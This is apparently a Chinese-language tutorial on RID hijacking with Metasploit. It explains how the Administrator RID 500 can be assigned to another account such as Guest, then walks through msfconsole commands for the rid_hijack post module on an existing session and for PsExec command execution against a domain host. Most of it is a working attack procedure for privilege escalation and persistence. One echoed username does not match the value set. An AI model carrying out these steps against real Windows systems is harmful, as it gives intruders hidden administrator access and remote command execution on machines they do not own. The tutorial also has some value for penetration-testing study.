msf实现rid劫持

rid劫持原理：

每个帐户都有一个指定的RID来标识它。与域控制器不同，Windows工作站和服务器会将大部分数据存储在HKLM\SAM\SAM\Domains\Account\Users项中，这需要访问System权限。它将通过设置一个相对标识符（RID）来更改帐户属性，该标识符应由目标机器上的一个现有账户拥有。利用一些Windows本地用户管理完整性的缺陷，该模块将允许使用一个已知帐户凭证（如GUEST帐户）进行身份验证，并使用另一个现有帐户（如Administrator帐户）的权限进行访问，即使禁用了Administrator账户。

实战

当然需要你具备一个shell，background，作为session

msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/manage/rid_hijack

msf5 post(windows/manage/rid_hijack) > set session 2

session => 2

msf5 post(windows/manage/rid_hijack) > show options

Module options (post/windows/manage/rid_hijack):

   Name           Current Setting  Required  Description

   ----           ---------------  --------  -----------

   GETSYSTEM      false            yes       Attempt to get SYSTEM privilege on the target host.

   GUEST_ACCOUNT  false            yes       Assign the defined RID to the Guest Account.

   PASSWORD                        no        Password to set to the defined user account.

   RID            500              yes       RID to set to the specified account.

   SESSION        2                yes       The session to run this module on.

   USERNAME                        no        User to set the defined RID.

msf5 post(windows/manage/rid_hijack) > set username ridhijack

username => administrator

msf5 post(windows/manage/rid_hijack) > set password xxxxxxxxxxx

password => xxxxxxxxxxx

msf5 post(windows/manage/rid_hijack) > set GETSYSTEM true

GETSYSTEM => true

msf5 post(windows/manage/rid_hijack) > run

话外补充：MSF使用PsExec

msf5 post(windows/manage/rid_hijack) > use auxiliary/admin/smb/psexec_command

msf5 auxiliary(admin/smb/psexec_command) > set rhosts 172.16.204.80

rhosts => 172.16.204.80

sf5 auxiliary(admin/smb/psexec_command) > show options

Module options (auxiliary/admin/smb/psexec_command):

   Name                  Current Setting                    Required  Description

   ----                  ---------------                    --------  -----------

   COMMAND               net group "Domain Admins" /domain  yes       The command you want to execute on the remote host

   RHOSTS                172.16.204.80                      yes       The target address range or CIDR identifier

   RPORT                 445                                yes       The Target port

   SERVICE_DESCRIPTION                                      no        Service description to to be used on target for pretty listing

   SERVICE_DISPLAY_NAME                                     no        The service display name

   SERVICE_NAME                                             no        The service name

   SMBDomain             .                                  no        The Windows domain to use for authentication

   SMBPass                                                  no        The password for the specified username

   SMBSHARE              C$                                 yes       The name of a writeable share on the server

   SMBUser                                                  no        The username to authenticate as

   THREADS               1                                  yes       The number of concurrent threads

   WINPATH               WINDOWS                            yes       The name of the remote Windows directory

msf5 auxiliary(admin/smb/psexec_command) > set smbuser administrator

smbuser => administrator

msf5 auxiliary(admin/smb/psexec_command) > set smbpass xxxxx

smbpass => xxxxx

msf5 auxiliary(admin/smb/psexec_command) > set smbdomain sec.com

smbdomain => sec.com

msf5 auxiliary(admin/smb/psexec_command) > set command whoami

command => whoami

msf5 auxiliary(admin/smb/psexec_command) > run